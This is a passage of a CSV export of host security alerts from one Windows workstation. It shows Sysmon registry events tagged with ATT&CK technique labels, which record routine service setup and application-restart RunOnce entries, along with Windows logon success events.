10:15:44.217"",""processGuid"":""{df9fc3d3-5f46-5ea5-0000-001064a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\cbdhsvc_3ddcb\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:15:44.217 +ProcessGuid: {df9fc3d3-5f46-5ea5-0000-001064a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\cbdhsvc_3ddcb\Start +Details: DWORD (0x00000003)""" +"Apr 26, 2020 @ 10:15:48.266",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:15:44.249076600Z"",""eventRecordID"":""818"",""processID"":""2200"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:15:44.217\r\nProcessGuid: {df9fc3d3-5f46-5ea5-0000-001064a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\CaptureService_3ddcb\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k LocalService -p\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:15:44.217"",""processGuid"":""{df9fc3d3-5f46-5ea5-0000-001064a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\CaptureService_3ddcb\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k LocalService -p""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:15:44.217 +ProcessGuid: {df9fc3d3-5f46-5ea5-0000-001064a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\CaptureService_3ddcb\ImagePath +Details: C:\Windows\system32\svchost.exe -k LocalService -p""" +"Apr 26, 2020 @ 10:15:48.151",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:15:44.248682500Z"",""eventRecordID"":""817"",""processID"":""2200"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:15:44.217\r\nProcessGuid: {df9fc3d3-5f46-5ea5-0000-001064a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\CaptureService_3ddcb\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:15:44.217"",""processGuid"":""{df9fc3d3-5f46-5ea5-0000-001064a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\CaptureService_3ddcb\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:15:44.217 +ProcessGuid: {df9fc3d3-5f46-5ea5-0000-001064a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\CaptureService_3ddcb\Start +Details: DWORD (0x00000003)""" +"Apr 26, 2020 @ 10:15:48.128",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:15:44.224697800Z"",""eventRecordID"":""816"",""processID"":""2200"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:15:44.217\r\nProcessGuid: {df9fc3d3-5f46-5ea5-0000-001064a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\BluetoothUserService_3ddcb\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k BthAppGroup -p\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:15:44.217"",""processGuid"":""{df9fc3d3-5f46-5ea5-0000-001064a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\BluetoothUserService_3ddcb\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k BthAppGroup -p""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:15:44.217 +ProcessGuid: {df9fc3d3-5f46-5ea5-0000-001064a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\BluetoothUserService_3ddcb\ImagePath +Details: C:\Windows\system32\svchost.exe -k BthAppGroup -p""" +"Apr 26, 2020 @ 10:15:48.123",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:15:44.224426600Z"",""eventRecordID"":""815"",""processID"":""2200"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:15:44.217\r\nProcessGuid: {df9fc3d3-5f46-5ea5-0000-001064a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\BluetoothUserService_3ddcb\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:15:44.217"",""processGuid"":""{df9fc3d3-5f46-5ea5-0000-001064a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\BluetoothUserService_3ddcb\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:15:44.217 +ProcessGuid: {df9fc3d3-5f46-5ea5-0000-001064a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\BluetoothUserService_3ddcb\Start +Details: DWORD (0x00000003)""" +"Apr 26, 2020 @ 10:15:48.096",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:15:44.223453900Z"",""eventRecordID"":""814"",""processID"":""2200"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:15:44.202\r\nProcessGuid: {df9fc3d3-5f46-5ea5-0000-001064a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\BcastDVRUserService_3ddcb\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k BcastDVRUserService\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:15:44.202"",""processGuid"":""{df9fc3d3-5f46-5ea5-0000-001064a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\BcastDVRUserService_3ddcb\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k BcastDVRUserService""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:15:44.202 +ProcessGuid: {df9fc3d3-5f46-5ea5-0000-001064a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\BcastDVRUserService_3ddcb\ImagePath +Details: C:\Windows\system32\svchost.exe -k BcastDVRUserService""" +"Apr 26, 2020 @ 10:15:48.047",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:15:44.223144600Z"",""eventRecordID"":""813"",""processID"":""2200"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:15:44.202\r\nProcessGuid: {df9fc3d3-5f46-5ea5-0000-001064a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\BcastDVRUserService_3ddcb\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:15:44.202"",""processGuid"":""{df9fc3d3-5f46-5ea5-0000-001064a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\BcastDVRUserService_3ddcb\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:15:44.202 +ProcessGuid: {df9fc3d3-5f46-5ea5-0000-001064a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\BcastDVRUserService_3ddcb\Start +Details: DWORD (0x00000003)""" +"Apr 26, 2020 @ 10:15:48.020",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:15:44.221998300Z"",""eventRecordID"":""812"",""processID"":""2200"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:15:44.202\r\nProcessGuid: {df9fc3d3-5f46-5ea5-0000-001064a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\AarSvc_3ddcb\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k AarSvcGroup -p\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:15:44.202"",""processGuid"":""{df9fc3d3-5f46-5ea5-0000-001064a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\AarSvc_3ddcb\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k AarSvcGroup -p""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:15:44.202 +ProcessGuid: {df9fc3d3-5f46-5ea5-0000-001064a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\AarSvc_3ddcb\ImagePath +Details: C:\Windows\system32\svchost.exe -k AarSvcGroup -p""" +"Apr 26, 2020 @ 10:15:47.984",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:15:44.221713900Z"",""eventRecordID"":""811"",""processID"":""2200"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:15:44.202\r\nProcessGuid: {df9fc3d3-5f46-5ea5-0000-001064a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\AarSvc_3ddcb\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:15:44.202"",""processGuid"":""{df9fc3d3-5f46-5ea5-0000-001064a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\AarSvc_3ddcb\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:15:44.202 +ProcessGuid: {df9fc3d3-5f46-5ea5-0000-001064a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\AarSvc_3ddcb\Start +Details: DWORD (0x00000003)""" +"Apr 26, 2020 @ 10:15:47.650",5,"SessionEnv was unavailable to handle a notification event",,"""The winlogon notification subscriber was unavailable to handle a notification event.""" +"Apr 26, 2020 @ 10:15:46.056",3,"Windows Workstation Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 2 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: No + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-21-438079597-2123118846-2669748851-1001 + Account Name: John Williams + Account Domain: DESKTOP-HUE026H + Logon ID: 0x37383 + Linked Logon ID: 0x37354 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x154 + Process Name: C:\Windows\System32\svchost.exe + +Network Information: + Workstation Name: DESKTOP-HUE026H + Source Network Address: 127.0.0.1 + Source Port: 0 + +Detailed Authentication Information: + Logon Process: User32 + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 26, 2020 @ 10:15:45.955",3,"Windows Workstation Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 2 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-21-438079597-2123118846-2669748851-1001 + Account Name: John Williams + Account Domain: DESKTOP-HUE026H + Logon ID: 0x37354 + Linked Logon ID: 0x37383 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x154 + Process Name: C:\Windows\System32\svchost.exe + +Network Information: + Workstation Name: DESKTOP-HUE026H + Source Network Address: 127.0.0.1 + Source Port: 0 + +Detailed Authentication Information: + Logon Process: User32 + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 26, 2020 @ 10:15:44.699",7,"SessionEnv was unavailable to handle a critical notification event",,"""The winlogon notification subscriber was unavailable to handle a critical notification event.""" +"Apr 26, 2020 @ 10:15:42.966",3,"Windows Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x24c + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 26, 2020 @ 10:15:40.623",3,"Ossec agent started.","ossec: Agent started: 'windows-10->any'.", +"Apr 26, 2020 @ 10:15:03.645",12,"ATT&CK T1160: Potential Run Key Persistence Setup","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-07T12:21:11.326435600Z"",""eventRecordID"":""751"",""processID"":""2092"",""threadID"":""1004"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-04-07 12:21:11.319\r\nProcessGuid: {df9fc3d3-6de1-5e8c-0000-00104fa30000}\r\nProcessId: 488\r\nImage: C:\\Windows\\system32\\csrss.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\Application Restart #3\r\nDetails: C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE /restore\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-04-07 12:21:11.319"",""processGuid"":""{df9fc3d3-6de1-5e8c-0000-00104fa30000}"",""processId"":""488"",""image"":""C:\\\\Windows\\\\system32\\\\csrss.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\Application Restart #3"",""details"":""C:\\\\Program Files\\\\Microsoft Office\\\\root\\\\Office16\\\\WINWORD.EXE /restore""}}}","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-04-07 12:21:11.319 +ProcessGuid: {df9fc3d3-6de1-5e8c-0000-00104fa30000} +ProcessId: 488 +Image: C:\Windows\system32\csrss.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\RunOnce\Application Restart #3 +Details: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE /restore""" +"Apr 26, 2020 @ 10:15:03.598",12,"ATT&CK T1160: Potential Run Key Persistence Setup","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-07T12:21:11.326252100Z"",""eventRecordID"":""750"",""processID"":""2092"",""threadID"":""1004"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-04-07 12:21:11.319\r\nProcessGuid: {df9fc3d3-6de1-5e8c-0000-00104fa30000}\r\nProcessId: 488\r\nImage: C:\\Windows\\system32\\csrss.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\Application Restart #2\r\nDetails: C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE /restore\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-04-07 12:21:11.319"",""processGuid"":""{df9fc3d3-6de1-5e8c-0000-00104fa30000}"",""processId"":""488"",""image"":""C:\\\\Windows\\\\system32\\\\csrss.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\Application Restart #2"",""details"":""C:\\\\Program Files\\\\Microsoft Office\\\\root\\\\Office16\\\\WINWORD.EXE /restore""}}}","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-04-07 12:21:11.319 +ProcessGuid: {df9fc3d3-6de1-5e8c-0000-00104fa30000} +ProcessId: 488 +Image: C:\Windows\system32\csrss.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\RunOnce\Application Restart #2 +Details: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE /restore""" +"Apr 26, 2020 @ 10:15:03.552",12,"ATT&CK T1160: Potential Run Key Persistence Setup","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-07T12:21:11.326134800Z"",""eventRecordID"":""749"",""processID"":""2092"",""threadID"":""1004"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-04-07 12:21:11.319\r\nProcessGuid: {df9fc3d3-6de1-5e8c-0000-00104fa30000}\r\nProcessId: 488\r\nImage: C:\\Windows\\system32\\csrss.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\Application Restart #1\r\nDetails: C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE /restore\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-04-07 12:21:11.319"",""processGuid"":""{df9fc3d3-6de1-5e8c-0000-00104fa30000}"",""processId"":""488"",""image"":""C:\\\\Windows\\\\system32\\\\csrss.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\Application Restart #1"",""details"":""C:\\\\Program Files\\\\Microsoft Office\\\\root\\\\Office16\\\\WINWORD.EXE /restore""}}}","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-04-07 12:21:11.319 +ProcessGuid: {df9fc3d3-6de1-5e8c-0000-00104fa30000} +ProcessId: 488 +Image: C:\Windows\system32\csrss.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\RunOnce\Application Restart #1 +Details: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE /restore""" +"Apr 26, 2020 @ 10:15:03.535",12,"ATT&CK T1160: Potential Run Key Persistence Setup","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-07T12:21:11.325997100Z"",""eventRecordID"":""748"",""processID"":""2092"",""threadID"":""1004"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-04-07 12:21:11.319\r\nProcessGuid: {df9fc3d3-6de1-5e8c-0000-00104fa30000}\r\nProcessId: 488\r\nImage: C:\\Windows\\system32\\csrss.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\Application Restart #0\r\nDetails: C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe --flag-switches-begin --flag-switches-end --enable-audio-service-sandbox --restore-last-session\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-04-07 12:21:11.319"",""processGuid"":""{df9fc3d3-6de1-5e8c-0000-00104fa30000}"",""processId"":""488"",""image"":""C:\\\\Windows\\\\system32\\\\csrss.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\Application Restart #0"",""details"":""C:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe --flag-switches-begin --flag-switches-end --enable-audio-service-sandbox --restore-last-session""}}}","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-04-07 12:21:11.319 +ProcessGuid: 